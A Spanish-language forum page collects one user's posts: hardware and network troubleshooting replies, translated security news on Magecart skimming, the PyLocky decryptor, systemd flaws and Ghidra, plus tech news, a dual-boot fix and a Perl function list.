This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - Dragora

Pages: 1 ... 110 111 [112] 113 114
2221
Dudas y pedidos generales / Re:ayuda teclado
« on: January 16, 2019, 07:20:30 pm »
Como  cuando enciendes la compu prende algún led del teclado o el infrarrojo del mouse.
si es así presiona F8 antes del inicio del WINDOWS
Porque a mí lo que me pasaba es que se me desactivaba cuando empezaba a cargar el windows
y si podía seleccionar el modo de inicio (F8)
ya una vez ai puedes checar el modo seguro, simbolo del sistema etc. y darle un Scaneo, si tu BIOS es actual
debes de tener una opción de RECOVERY o algo así, donde puedes diagnosticar alguna falla o restablecerlo a un punto anterior.
Si nada de esto te funciona, utiliza un CDlive para que le pases un antimalware o antivirus.
(tomando en cuenta que debes de iniciar con el CD o usb entrando ala configuración del BIOS)
si el mouse y el teclado no te lo detecta desde que enciendes la compu, osea que ni al BIOS te deje entras entonces el problema no es con el WINDOWS si no con el hardware.

Espero te sea de ayuda.

2222
Noticias Informáticas / Infectan los sitios de comercio electrónico
« on: January 16, 2019, 07:07:17 pm »

Los hackers infectan los sitios de comercio electrónico al comprometer a su socio publicitario

Magecart ataca de nuevo, uno de los grupos de piratería más notorios se especializa en el robo de datos de tarjetas de crédito de sitios web de comercio electrónico con poca seguridad.
Según investigadores de seguridad de RiskIQ y Trend Micro, los ciberdelincuentes de un nuevo subgrupo de Magecart, etiquetado como "Magecart Group 12", recientemente han comprometido con éxito casi 277 sitios web de comercio electrónico mediante el uso de ataques en la cadena de suministro.
Magecart es el mismo grupo de analizadores de tarjetas de crédito digitales que ocuparon los titulares el año pasado por llevar a cabo ataques contra algunas grandes empresas, como Ticketmaster , British Airways y Newegg .
Normalmente, los piratas informáticos de Magecart comprometen los sitios de comercio electrónico e insertan código JavaScript malicioso en sus páginas de pago que capturan en silencio la información de pago de los clientes que realizan compras en los sitios y luego los envían al servidor remoto del atacante.

Sin embargo, los investigadores de las dos empresas revelaron que, en lugar de comprometer directamente los sitios web dirigidos, el Grupo 12 de Magecart pirateaba e insertaba su código de skimming en una biblioteca de JavaScript de terceros, permitiendo que todos los sitios web que usan ese script carguen el código malicioso.




La biblioteca de terceros a la que apunta Magecart Group 12 es una empresa francesa de publicidad en línea, llamada Adverline, cuyo servicio está siendo utilizado por cientos de sitios web de comercio electrónico europeos para mostrar anuncios.


"En el momento de nuestra investigación, los sitios web incrustados con el script de redireccionamiento de Adverline cargaron el código de skimming de Magecart Group 12, que, a su vez, omite la información de pago ingresada en las páginas web y luego la envía a su servidor remoto", señala Trend Micro .


Que es mas El investigador de seguridad Yonathan Klijnsma en RiskIQ descubrió que el código skimmer para MageCart Group 12 se protege de la ofuscación y el análisis al realizar una verificación de integridad dos veces.

"Magecart Group 12 usa un kit de herramientas de limpieza que emplea dos secuencias de comandos ofuscadas. La primera secuencia de comandos es principalmente para anti-inversión, mientras que la segunda secuencia de comandos es el principal código de identificación de datos", dicen los investigadores. En el momento de la infección, el código de verificación de datos primero verifica si se ejecuta en una página web de carrito de la compra adecuada. Lo hace detectando cadenas relacionadas en la URL como 'pago y envío', 'facturación', 'compra', 'panier', que significa 'cesta' en francés, y 'kasse', que significa 'pago' en alemán.




Una vez que detecte cualquiera de estas cadenas en la URL, la secuencia de comandos comenzará a realizar el comportamiento de skimming copiando tanto el nombre del formulario como los valores ingresados ​​por el usuario en el formulario de escritura de la página web.

Los datos de pago y facturación robados se almacenan en el LocalStorage de JavaScript con el nombre clave 'Caché' en formato Base64. Para especificar víctimas individuales, el código también genera un número aleatorio que se reserva en LocalStorage con el nombre de clave E-tag.
"Un evento de JavaScript 'descargar' se activa cuando el usuario cierra o actualiza la página web de pago. La secuencia de comandos envía los datos de pago, el número aleatorio (etiqueta electrónica) y el dominio del sitio web de comercio electrónico a un servidor remoto. a través de HTTP POST, con codificación Base64 en toda la fecha de envío ", explican los investigadores de Trend Micro. Los investigadores también publicaron los COI asociados con la operación de este Grupo 12, que incluye los dominios que los skimmers utilizaron para inyectar su código en los sitios web afectados y recibir la información de pago robada.
Al contactar, Adverline solucionó el problema inmediatamente y eliminó el código malicioso de su biblioteca de JavaScript.


Via:hackernews.com

2223
Dudas y pedidos generales / Re:Problema con katoolin en ubuntu studio
« on: January 12, 2019, 10:48:12 pm »
1. A veces sucede ese tipo de error debido a que colocas repositorios erroneos puedes checar acá: You are not allowed to view links. Register or Login

2. O puede que necesites estos dos comandos que aparecen en este ejemplo: You are not allowed to view links. Register or Login

3.En utlima istancia revisado lo anterior te recomiendo You are not allowed to view links. Register or Login


Espero te sea de ayuda, Saludos.

2224
Seguridad / Herramienta de descifrado de ransomware PyLocky
« on: January 12, 2019, 08:18:39 pm »
Si su computadora ha sido infectada con PyLocky Ransomware y está buscando una herramienta gratuita de desencriptación de ransomware para desbloquear o desencriptar sus archivos, su búsqueda podría terminar aquí.




El investigador de seguridad Mike Bautista de la unidad de inteligencia cibernética Talos de Cisco ha lanzado una herramienta gratuita de descifrado que permite a las víctimas infectadas con el ransomware PyLocky desbloquear sus archivos cifrados de forma gratuita sin tener que pagar ningún rescate.
La herramienta de descifrado funciona para todos, pero tiene una gran limitación: para recuperar con éxito sus archivos, debe haber capturado el tráfico de red inicial (archivo PCAP) entre el ransomware de PyLocky y su servidor de comando y control (C2), que generalmente nadie lo hace a propósito.

Esto se debe a que la conexión de salida (cuando el ransomware se comunica con su servidor C2 y envía información relacionada con la clave de descifrado) contiene una cadena que incluye tanto el Vector de inicialización (IV) como una contraseña, que el ransomware genera aleatoriamente para cifrar los archivos.

"Si el tráfico inicial de C2 no se ha capturado, nuestra herramienta de descifrado no podrá recuperar los archivos en una máquina infectada. Esto se debe a que el malware utiliza el reclamo inicial para enviar la información de los servidores C2 que utiliza en el proceso de cifrado. , "explica el investigador.
Descubierto por primera vez por investigadores de Trend Micro en julio del año pasado, el ransomware de PyLocky descubrió la propagación a través de correos electrónicos no deseados, como la mayoría de las campañas de malware, diseñadas para engañar a las víctimas para que ejecuten la carga maliciosa de PyLocky.





Para evitar la detección por parte del software de seguridad de la zona de pruebas, el ransomware de PyLocky duerme durante 999.999 segundos, o un poco más de 11 días y medio, si el tamaño total de la memoria visible del sistema afectado es inferior a 4 GB. El proceso de cifrado de archivos solo se ejecuta si es mayor o igual a 4GB.
Escrito en Python y empaquetado con PyInstaller, el ransomware de PyLocky primero convierte cada archivo al formato base64 y luego utiliza el Vector de Inicialización (IV) generado aleatoriamente para cifrar todos los archivos en una computadora infectada
Una vez que una computadora está encriptada, PyLocky muestra una nota de rescate que dice ser una variante del conocido ransomware Locky y exige un rescate en criptomoneda para "restaurar" los archivos.
La nota también afirma que dobla el rescate cada 96 horas si no pagan para asustar a las víctimas para que paguen el rescate más temprano que tarde.
PyLocky se enfocó principalmente en negocios en Europa, particularmente en Francia, aunque las notas de rescate estaban escritas en inglés, francés, coreano e italiano, lo que sugería que también podría haber apuntado a usuarios de habla coreana e italiana.

Puede descargar la herramienta de descifrado de ransomware PyLocky de GitHub de forma gratuita y ejecutarla en su computadora con Windows infectada.
Aunque el ransomware no sea tan alto como elLocky , WannaCry , NotPetya y LeakerLocker difundieron los ataques de ransomware en 2017. Se recomienda encarecidamente a individuos y empresas que sigan las medidas de prevención mencionadas a continuación para protegerse.
Tenga cuidado con los correos electrónicos de phishing: siempre sospeche de los documentos no solicitados que se envían por correo electrónico y nunca haga clic en los enlaces dentro de esos documentos a menos que se verifique la fuente.
Realice copias de seguridad regularmente: para tener siempre un control estricto de todos sus archivos y documentos importantes, mantenga una buena rutina de copia de seguridad en su lugar que haga sus copias en un dispositivo de almacenamiento externo que no siempre esté conectado a su PC.
Mantenga su software antivirus y su sistema actualizados: Mantenga siempre su software y sistemas antivirus actualizados para protegerse contra las amenazas más recientes.


Puede descargarla desde acá: You are not allowed to view links. Register or Login


Via: thehackernews.com

2225


Las nuevas fallas en la escalada de privilegios de Systemd afectan la mayoría de las distribuciones de Linux.

Los investigadores de seguridad han descubierto tres vulnerabilidades en Systemd, un popular sistema de inicio y administrador de servicios para la mayoría de los sistemas operativos Linux, que podrían permitir que los atacantes locales sin privilegios o los programas maliciosos obtengan acceso de root en los sistemas seleccionados.
Las vulnerabilidades, asignadas como CVE-2018-16864, CVE-2018-16865 y CVE-2018-16866, en realidad residen en el servicio "systemd-journald" que recopila información de diferentes fuentes y crea registros de eventos al registrar la información en la revista.

Las vulnerabilidades, que fueron descubiertas e informadas por los investigadores de seguridad de Qualys, afectan a todas las distribuciones de Linux basadas en sistemas, incluidas Redhat y Debian , según los investigadores.
Sin embargo, algunas distribuciones de Linux como SUSE Linux Enterprise 15, openSUSE Leap 15.0, y Fedora 28 y 29 no se ven afectadas, ya que "su espacio de usuario [código] se compila con la protección de fcc-clust de GCC ".
Los dos primeros defectos son problemas de corrupción de memoria, mientras que el tercero es un problema de lectura fuera de los límites en systemd-journald que puede filtrar datos confidenciales de la memoria del proceso.
Los investigadores han creado con éxito explotaciones de prueba de concepto, que planean lanzar en un futuro próximo.
"Desarrollamos un exploit para CVE-2018-16865 y CVE-2018-16866 que obtiene una cáscara de raíz local en 10 minutos en i386 y 70 minutos en amd64, en promedio", escribieron los investigadores en un  aviso  publicado el miércoles.

CVE-2018-16864 es similar a una vulnerabilidad de Stack Clash que los investigadores de Qualys descubrieron en 2017 y que pueden ser explotados por malware o usuarios con pocos privilegios para escalar su permiso de root.
Según los investigadores, CVE-2018-16864 existía en la base de código de systemd desde abril de 2013 (systemd v203) y se hizo explotable en febrero de 2016 (systemd v230), mientras que CVE-2018-16865 se introdujo en diciembre de 2011 (systemd v38) y se hizo explotable en abril de 2013 (systemd v201), dice Qualys.
Sin embargo, la tercera vulnerabilidad (CVE-2018-16866) se introdujo en la base de código de systemd en junio de 2015 (systemd v221), pero según los investigadores, se "corrigió inadvertidamente en agosto de 2018".
Si está utilizando un sistema Linux vulnerable, consulte las últimas actualizaciones de su respectiva distribución de Linux e instale los parches tan pronto como se publiquen.


Via: Thehackernews.com

2226
GNU/Linux / Problemas con el arranque Dual
« on: January 12, 2019, 06:12:22 pm »
Como lo menciona el titulo de este post, problemas con el arranque Dual, en este caso Windows 10 y Linux en el mismo Disco, suena raro pero es algo bastante habitual, maximo si eres principiante.
-


Discos con Arranque Dual

Hay parámetros relativos al estado del sistema de archivos de cualquier partición NTFS o FAT. Una vez apagado Windows 10 con la opción de ‘Inicio Rápido’, si accedes a su partición desde otro sistema operativo, en el momento de volver a arrancarlo, éste puede detectar inconsistencias en el sistema de archivos.

Si bien esto se puede arreglar con analizar el disco duro, en el peor de los escenarios incluso podría llegar a producirse la pérdida de datos en la partición de Windows 10, por lo que vale la pena darle la suficiente importancia como para evitar que se de ninguna de estas desafortunadas situaciones.

Considerando el hecho de que Linux puede leer particiones FAT y NTFS, si tienes instalada cualquier distribución GNU/Linux junto con Windows 10, es posible que desde GNU/Linux desees acceder a la partición de Windows 10 por alguna razón, con lo que es fácil que se de el problema. Más aún, teniendo en cuenta que la opción de ‘inicio rápido’ suele venir habilitada por defecto.

Apagar Completamente Windows de Forma Manual

Una opción para evitar que esto suceda es forzar un apagado completo de Windows al salir. Esto pasa por evitar cerrar el sistema operativo de la forma habitual (utilizando la opción de Inicio Rápido, que es tal y como viene configurado de serie). En vez de ello, puedes abrir la consola de Windows o CMD, y teclear el siguiente comando:

shutdown /s
Esta es una forma alternativa de apagar Windows, saltándote la característica de “Inicio Rápido” pero sin modificar la configuración por defecto. Otra opción mucho más práctica (pero que puede comportar un apagado algo más lento) es deshabilitar directamente el “Inicio Rápido” en el apagado del sistema. Esta es la opción que te explico a continuación.

Como Deshabilitar la Opción de Inicio Rápido en el Apagado de Windows

Afortunadamente, la solución pasa por deshabilitar la opción de ‘inicio rápido’ en Windows 10, de modo que el sistema siempre se apagará del modo tradicional. Para hacer esto, basta con:

Abrir el Panel de Control de Windows
Seleccionar la categoría de Opciones de Energía
En las opciones de la izquierda, marcar en Elegir el comportamiento de los botones de inicio/apagado
Con esto, deberías visualizar las opciones que Se muestra en la captura



Si te fijas en la parte inferior, debajo del apartado Configuración de apagado hay una serie de opciones que puedes marcar y desmarcar. La primera de ellas es justamente la de Activar inicio rápido (recomendado), que debería venir marcada por defecto.

Ahora mismo verás que no la puedes desmarcar, pero si te fijas en la parte superior, hay un enlace donde pone Cambiar la configuración actualmente no disponible. Si haces click en este enlace, te saltará el popup del control de cuentas de usuario para que confirmes que realmente quieres realizar los cambios.

Hecho esto, ya podrás desmarcar la casilla de Activar inicio rápido (recomendado) y guardar los cambios a continuación. Con esto ya habrás deshabilitado la característica de inicio rápido.

Si bien la característica del apagado se soluciona con esto, es importante tener en cuenta que el problema que he comentado también se puede presentar si decides hibernar el sistema manualmente. Así, en cualquier situación, si decides suspender o hibernar el sistema, y al volver a encenderlo lo haces con el sistema operativo de otra partición, puedes encontrarte con los mismos problemas.

En este sentido, y más allá del caso concreto de Windows 10 y Linux, en el caso de que dispongas de dos o más sistemas operativos en el mismo disco duro, la mejor manera de prevenir contratiempos de ese tipo seria asegurarse de que se ha apagado el equipo correctamente, antes de acceder al sistema operativo de otra partición.




¿Te ha sucedido este problema, tienes más soluciones?, comparte con nosotros para que otros que tengan el mismo problema lo puedan solucionar.


2227


UHD de Netflix permite usar hasta cuatro dispositivos simultáneos con la misma cuenta sin importar cuál sea su ubicación, por lo que compartir cuenta es algo que se hace con facilidad y que permite ahorrar bastante dinero. La propia Netflix no se ha pronunciado en contra de este tipo de prácticas, pero la IA creada por una empresa británica podría acabar con ellas.

La IA de Synamedia puede analizar todos los datos de los usuarios de la plataforma para saber si comparten cuenta

La empresa, llamada Synamedia, ha presentado en el CES de 2019 un servicio que utiliza machine learning para encontrar usuarios con contraseñas compartidas. Para que la empresa pueda analizar los datos de los usuarios, es necesario que primero la plataforma de streaming le dé acceso a ello. Una vez los tiene, analiza desde dónde se está usando la cuenta, cuánto tiempo se usa, qué contenido se ve y desde qué dispositivo.

A partir de ahí, es capaz de encontrar patrones que indican que una contraseña se está compartiendo con varios usuarios a la vez, y arroja un porcentaje de probabilidad de que la cuenta esté siendo compartida, el cual la compañía devuelve a la plataforma de streaming.

Con los datos en la mano, la plataforma de streaming puede decidir qué hacer, o establecer una horquilla sobre qué porcentaje de probabilidad es suficientemente elevado para garantizar que una cuenta se está compartiendo. Una muestra muy sencilla de que una persona está compartiendo cuenta con otras es que accede a la plataforma al mismo tiempo desde sitios que están separados entre sí por cientos o miles de kilómetros. E incluso es más obvio cuando esos sitios son siempre los mismos. También puede identificar campus universitarios, donde afirman que hay un pico de usuarios que comparten cuentas.

En el caso de que una cuenta se esté compartiendo con gente por Internet, la plataforma sí podría decidir cerrar la cuenta. Sin embargo, si se está compartiendo con familiares o conocidos cercanos, se podría enviar un simple email sugiriendo que dejen de hacerlo.
Netflix y otras plataformas podrían estar interesadas en ellos
La compañía está particularmente orgullosa de su sistema, y afirma que gracias a utilizar machine learning, éste está aprendiendo constantemente patrones de visualización de contenido, ya que las plataformas no paran de renovarlo constantemente. El hecho de estar basado en machine learning le permite ir adaptándose a los cambios.

Jean-Marc Racine, CEO de Synamedia, afirma que este tipo de servicios se demandan cada vez más, y es una muestra de la madurez del mercado de las plataformas de streaming. Cuando una plataforma está arrancando le da igual que haya usuarios que compartan cuentan, ya que es una manera de introducirles al sistema y fidelizarlos. Sin embargo, a largo plazo están perdiendo ingresos.

El servicio de la compañía, llamado Credentials Sharing Insight, está siendo probado por una serie de empresas, pero no han detallado cuáles. La empresa vende otros de sus servicios a grandes como AT&T, Comcast, Disney, Verizon, y Sky, donde esta última ha anunciado que ha comprado una parte. Dependiendo del uso, el tiro le puede salir por la culata dependiendo del grado de radicalidad con el que lo implanten.

Fuente: The Verge

2228
Dudas y pedidos generales / Re:Problemas con una tarjeta de red
« on: January 09, 2019, 08:29:53 pm »
Bueno pues si ya revisaste conexiones, cables, configuración, hasta con otro equipo puedes pasar un equipo que este en uso y probar si funciona, si al hacer esto no funciona quiere decir que te tienes que comunicar a la central para que te den los permisos necesarios para tener la conexión libe ya que algunas empresas tienen bloqueadas algunas cosas para que no anden conectando equipos a diestra y siniestra para que no se sobrecargue la red, etc. Pues ya tienes bases para hablar con ellos, suerte.


2229
Dudas y pedidos generales / Re:Problemas con una tarjeta de red
« on: January 09, 2019, 06:46:04 pm »
Ha intentando ejecutar el comando show ip dhcp binding  en el router, este deberia mostrar la IP asignada y la direccion MAC, luego puede buscar la direccion MAC en el switch usando el comando:

show mac address-table | include <la direccion MAC o al menos los últimos 4 digitos>

ejemplo

show mac address | include A4B7.

El comando "Show ip arp" debes usarlo solo en tu Router, ya que  el SW no te lo va a tomar, el SW no hace asociaciones IP-Mac address, lo que debes hacer primero es entrar en tu router, introducir "show ip arp | include LaIPdeTuDHCP" y alli te va a decir que mac address esta asociada con esa IP. Cuando ya tengas la mac address puedes ingresar a tu SW e ingresar el "show mac address-table" para saber en cual de los puertos del SW esta tu DHCP conectado.


2230


A estas alturas, y después de haber tomado todo tipo de medidas, Google sigue teniendo graves problemas de seguridad en su tienda de aplicaciones oficial para Android, la Google Play Store. Siguen colándose apps con malware de todo tipo, y con una frecuencia preocupante. La compañía de Mountain View ha tenido que borrar 85 apps recientemente, porque no tenían ningún tipo de utilidad y únicamente se dedicaban a mostrar anuncios a los 9 millones de usuarios afectados, según el volumen de descargas registrado de forma oficial.

La mayoría de las apps maliciosas que se cuelan en la Google Play Store tienen una intención muy clara: usar la CPU –o la GPU- para minar criptomonedas, espiar nuestras conversaciones, conseguir acceso remoto o robar información privada del usuario, por ejemplo. Estas aplicaciones retiradas, un total de 85 según el informe publicado por Trend Micro, no tenían un enfoque perjudicial para el usuario o su dispositivo de forma directa. Sencillamente eran inútiles porque no tenían función alguna, y se dedicaban a mostrar anuncios. Evidentemente, todas ellas engañando en la descripción, el nombre y el icono para convencer a sus víctimas de la descarga.

Una vez más, a Google se le han colado 85 apps Android ‘maliciosas’ dentro de la Google Play Store alcanzando a 9 millones de usuarios

Para engañar a Google y a los sistemas de seguridad de la Play Store, estas 85 aplicaciones fueron publicadas con distintos desarrolladores y diferentes firmas. Tanto el icono como el nombre y la descripción estaban diseñados para que el usuario crea que tienen utilidad, pero en realidad no cumplían ninguna de ellas ninguna de las funciones descritas. Ni son juegos, ni son mandos a distancia para el televisor, ni son nada de lo que también aparecía en la Google Play Store; tan solo una aplicación que se dedica a mostrar anuncios de publicidad de manera masiva, evidentemente, para generar ingresos a sus creadores.

Lo más preocupante es que la compañía de Mountain View, una vez más, ha tardado demasiado tiempo en darse cuenta del grave problema y retirar las aplicaciones de la Google Play Store. Tanto, que en ese plazo ha dado tiempo para que todas ellas alcancen un volumen conjunto de descargas de 9 millones. Algunas, como TV Remote, han alcanzado en solitario los 5 millones de descargas por parte de usuarios de dispositivos móviles Android.

Via:adslzone.net

2231
Dudas y pedidos generales / Re:Problemas con una tarjeta de red
« on: January 09, 2019, 03:40:32 pm »
Ya revisaste que los conectores esten bien ponchados y que los colores en la conexion esten bien?. Destapa la roseta y verifica eso.




Ya que si ya revisaste la configuración y todo esta bien, ya checaste la tarjeta e igual esta bien puede que sea problema de los conectores. tal vez hayan ponchado el cable con la combinación para teléfono y no para red por eso conectas un teléfono y si te funciona pero al conectar la computadora no te lo reconoce.


Saludos.

2232

La Agencia de Seguridad Nacional de los Estados Unidos (NSA, por sus siglas en inglés) planea lanzar gratuitamente su herramienta de ingeniería inversa desarrollada internamente en la próxima conferencia de seguridad RSA 2019 que se realizará en marzo en San Francisco.
La existencia del marco, denominado GHIDRA, fue revelada públicamente por primera vez por WikiLeaks en las filtraciones de la CIA Vault 7, pero la herramienta salió a la luz una vez que el Asesor Principal de la NSA, Robert Joyce, anunció su lanzamiento público de forma gratuita en su descripción de la sesión de la Conferencia RSA.

 
La herramienta de ingeniería inversa es un desensamblador, por ejemplo, IDA-Pro, que ayuda a los investigadores a identificar ciertas partes de un programa para ver cómo funcionan al leer información como las instrucciones de su procesador, la longitud de las instrucciones y más.
GHIDRA es un marco de ingeniería inversa basado en Java que cuenta con una interfaz gráfica de usuario (GUI) y se ha diseñado para ejecutarse en una variedad de plataformas que incluyen los sistemas operativos Windows, macOS y Linux, y también admite una variedad de conjuntos de instrucciones de procesador.
El kit de herramientas también se puede utilizar para analizar los archivos binarios utilizados por los programas, incluido el malware, para los principales sistemas operativos, incluidos Windows, macOS, Linux y plataformas móviles como Android e iOS.

Una sinopsis de la presentación de Joyce señala que "la plataforma Ghidra incluye todas las características esperadas en las herramientas comerciales de alto nivel, con una funcionalidad nueva y ampliada desarrollada de forma única por NSA, y se lanzará para uso público gratuito en RSA".
De acuerdo con los documentos de Vault 7, la NSA desarrolló inicialmente GHIDRA a principios de la década de 2000, y un usuario de Reddit llamado hash_define que afirmó haber tenido acceso a GHIDRA dijo que la herramienta había sido compartida con otras agencias gubernamentales de los EE. UU. En los últimos años. .
Si bien no hay tal anuncio de que la NSA planea abrir GHIDRA de código abierto, algunos creen que la agencia también publicará el código fuente de GHIDRA en el repositorio de código de la NSA alojado por Github, donde ya ha lanzado 32 proyectos, para que la comunidad de código abierto pueda ayudar a mantener Es gratis.


Via: thehackernews.com

2233

La conocida como neutralidad en Internet o neutralidad en la Red, es un concepto del que se viene hablando desde hace muchos años y al mismo tiempo es un controvertido tema que muchos defienden, pero no todo el mundo respeta.

Y es entonces cuando entra en juego una de las empresas que durante décadas mayor influencia ha tenido en Internet, más concretamente en el apartado del intercambio de archivos, hablamos, como no, de BitTorrent. Pues bien, esta es una firma que hace unos meses fue adquirida por el fundador de una de las criptomonedas más conocidas, TRON, por lo que comenzaron su andadura conjunta gracias a un ambicioso proyecto que tienen planeado.

En concreto nos referimos a que la mencionada BitTorrent y TRON tienen en mente un plan con el que pretenden mejorar el protocolo de la firma y que beneficiará a los propios usuarios, al menos a algunos. Y es que con esto, no sólo se recompensará económicamente a los usuarios que compartan ficheros con otros a través del protocolo BitTorrent, sino que también podrán pagar por tener un acceso más rápido a la Red. Pero claro, aunque esto puede sonar bien para algunos, otros muchos se están preguntando ahora si esto respeta la lucha de la misma BitTorrent por la llamada Neutralidad en Internet.

Todo esto se anunció hace solo unos meses, cuanto BitTorrent y su nuevo propietario, TRON, comenzaron a hablar de un nuevo plan para ampliar y modernizar el uso del protocolo por medio del conocido como Proyecto Atlas. Esto se centra en añadir «monedas» a dicho protocolo de intercambio de archivos a través de una serie de extensiones, lo que permite recompensar financieramente a algunos usuarios o acelerar las descargas, pero pagando por tener un acceso más rápido.

Los planes de BitTorrent podría no respetar la Neutralidad en la Red

Así, esta misma semana, el CEO de BitTorrent, Justin Sun, confirmó el plan del que os hablamos al anunciar el nuevo token de BitTorrent, BTT, que se utilizará para pagar y así obtener una mejor la velocidad de la Red. Pero claro, de momento se trata de un producto que aún no ha sido lanzado, pero por lo que ya se ha podido saber de todo ello, ahora muchos se plantean la pregunta de si este plan conocido como Proyecto Atlas, es compatible con la tan defendida hasta la fecha por BitTorrent, Neutralidad en la Red.

Lo curioso del tema es que la propia firma de intercambio de archivos ha sido una feroz defensora de poner a disposición de todo el mundo un Internet abierto, de hecho fue la pionera en la defensa de la Neutralidad en la Red, criticando repetidamente la priorización del tráfico pagado por tener una mejor conexión, que es precisamente lo que están planeando llevar a cabo ahora. Es más, la propia BitTorrent llegó incluso a crear el sitio web dedicado para luchar contra los planes de la FCC o Comisión Federal de Comunicaciones, de inmiscuirse en el comentado Internet abierto.

En aquellos momentos, la firma aseguraba que los cambios propuestos por la FCC iban en contra de las creencias de la Neutralidad en la Red, ya que crearían un «carril rápido» y preferencial para cierto tráfico asignado, por los que aquellos con dinero, podrán pagar por esta vía más rápida y tendrán la capacidad de acceder y distribuir contenidos a mayor velocidad. Al mismo tiempo, los que carecen de poder adquisitivo, se verán perjudicados, lo que nos llevaría a tener un Internet centrado en la discriminación, lo que no se puede permitir, decían.

No todo el mundo apoya los nuevos planes de BitTorrent y TRON

Por tanto ahora muchos están comparando esos planes de la FCC con los actualmente presentados por BitTorrent, ya que los «pecados» que previsiblemente se van a cometer, son muy parecidos. La principal diferencia estriba en que en el caso de la FCC, los llamados carriles rápidos, a menudo se refieren a empresas que pagan por disponer de un mejor acceso a Internet.


Esto nos lleva de nuevo al Proyecto Atlas, que promete pagar a determinados usuarios por su ancho de banda, lo que puede sonar muy bien para muchos, pero también otros consideran que ciertas personas van a pagar por tener un acceso más rápido, además de otros beneficios. Aunque por el momento los detalles son escasos, está claro que con el token BTT los usuarios podrán pagar para acelerar sus descargas, pero todavía no está del todo claro cómo funcionará esto, pero es probable que un descargador que paga, tenga prioridad sobre los demás.

Por tanto, estos planes suenan en algunos puntos muy parecidos a los mencionados de la FCC con un “carril rápido” o una priorización pagada, aunque en lugar de para las empresas, para ciertos usuarios con un mayor poder adquisitivo. De hecho, cuando se les ha preguntado a este respecto tanto a TRON como a la propia BitTorrent, no han querido hacer comentario alguno. Lo que queda patente es que con este nuevo sistema, algunos usuarios podrán obtener un mayor ancho de banda del disponible, lo que ya de por sí significa que otros recibirán los archivos más lentamente.

Sin embargo, al mismo tiempo también es cierto que estos incentivos monetarios también pueden aumentar la velocidad en términos generales, ya que la gente compartirá más información con el resto, lo que podría beneficiar a todos igualmente.


Via:adslzone.net/


2234
Perl / Funciones más utilizadas en la programación de un perl script
« on: January 06, 2019, 01:01:06 am »
A continuación se describen algunas de las funciones más utilizadas en la programación de un perl script, esto no pretende ser un manual de referencia luego para conseguir el formato puedes usar el comando man perl:





abs: devuelve el valor absoluto de la expresion pasada.
chmod: cambia los permisos de los ficheros dados.
chop: recorta y retorna el último carácter de una cadena.
chown: cambia el propietario de los ficheros dados.
close : cierra un fichero.
cos: devuelve el coseno del angulo dado en radianes.
defined: sirve para comprobar si existe una variable,formato, subrutina,etc..
delete: borra un valor de un array asociativo a traves de su clave.
die: imprime en la salida del error estandar un mensaje pasado como parametro cuando ocurre un error en la ejecucion de una sentencia.
eof: retorna verdadero si el final del fichero dado.
eval: evalua la expresión pasada como si se tratase de un pequeño programa perl.
exec: ejecuta lo que pasemos como parametro y sale del programa.
exit: hace que salgamos del perl script devolviendo al sistema operativo el valor pasado como argumento.
exp: retorna el numero e elevado a la potencia pasada como parametro.
fileno: devuelve el descriptor del manejador del fichero pasado como parametro.
fork: realiza una llamada fork.
getc: lee el siguiente caracter del fichero especificado.
hex: devuelve el valor decimal del numero hexadecimal pasado como parametro.
index: devuelve la posicion de la primera ocurrencia de una cadena en otra.
int: devuelve la parte entera del parametro pasado.
join: une las cadenas pasadas como argumento con un separador tambien pasado como argumento.
keys: devuelve todas las claves de un array asociativo.
length: devuelve la longitud en caracteres del parametro pasado.
local: declara como locales las variables pasadas como argumentos.
log: devuelve el logaritmo del numero dado.
mkdir: crea un directorio en el camino dado.
oct: devuelve el valor decimal del numero octal pasado como parametro.
open: abre el fichero fichero dado asociandole un manejador de fichero especificado tambien como parametro.
pop: retorna y borra el ultimo elemento del array dado.
print: muestra en la salida standard o en el fichero especificado la expresion dada.
push: añade el valor dado al final del array pasado como parametro.
rand: devuelve un numero aleatorio entre 0 y el valor pasado como argumento.
read: lee un determinado numero de caracteres desde el fichero pasado como argumento.
rename: sirve para renombrar un fichero.
require: sirve para incluir codigo externo en nuestro guion.
return: devuelve un valor desde una subrutina.
rmdir: borra un directorio.
seek: situa un puntero a fichero en un lugar determinado.
select: sirve para seleccionar el manejador de fichero que sera utilizado por defecto para la salida de los comandos o funciones que no especifiquen un determinado manejador de fichero como parametro.
shift: devuelve el primer valor del array dado borrandolo posteriormente.
sin: devuelve el seno del angulo pasado en radianes.
sleep: causa que el perl script o guion se detenga el numero de segundos especificados.
sort: ordena el array dado.
split: divide una cadena en subcadenas segun el separador especificado.
sqrt: devuelve la raiz cuadrada del numero pasado.
system: igual que exec pero no se sale del perl script.
tell: devuelve la posicion actual del puntero a fichero del manejador de fichero especificado.
values: devuelve todos los valores del array asociativo dado.
write: escribe un registro con formato en el fichero asociado a ese formato.

Espero sea de ayuda, saludos.


Fuente:Perl-rules.mx

2235
La IA ayuda a convertir en palabras el pensamiento, y el siguiente paso será dar voz a personas que perdieron el habla



Muchas personas a lo largo y ancho del mundo viven habiendo perdido la capacidad de hablar, ya haya sido como consecuencia de un accidente vascular o de alguna enfermedad; condenados a que las palabras que resuenan en su cabeza se queden ahí atrapadas.

La mayoría no tienen opción de comunicarse más que a través de sintetizadores de voz manejados con movimientos limitados, como le ocurría al cosmólogo Stephen Hawking. Pero la tecnología puede a ayudarles a cambiar eso en breve.

De los electrodos al sintetizador de voz
Hasta ahora se había logrado dar un paso bastante reseñable: que personas con parálisis profunda pudieran responder con un 'sí' o un 'no'.

Ahora, tres equipos de investigadores han logrado dar pasos importantes en los últimos meses para convertir los datos en crudo captados por redes de electrodos (implantadas quirúrgicamente en el cerebro)** en palabras y oraciones** computerizadas que, en algunos casos, resultaban inteligibles para los oyentes humanos.

No echemos las campas al vuelo: ninguno de los tres equipos logró que las computadoras verbalizar el discurso tal y como lo habían pensado los sujetos del estudio.

Los sujetos de estudio fueron sometidos a pruebas (escuchar grabaciones de audio, pensar en silencio, leer en voz alta, etc) mientras los investigadores monitorizaban la corteza auditiva del cerebro, que permanece activa tanto cuando escuchamos como cuando hablamos.

El equipo dirigido por Nima Mesgarani en la Univ. de Columbia hizo uso de datos captados en cinco personas con epilepsia: una red neuronal analizó los datos medida que los pacientes escuchaban a personas que nombraban dígitos de cero a nueve.

La IA fue luego capaz de reconstruir las palabras con un 75% de precisión. El experimento realizado por el equipo del neurocirujano de la UCLA Edward Chang se tradujo en varias frases que fueron identificadas correctamente por 166 personas en un 80% de los casos.

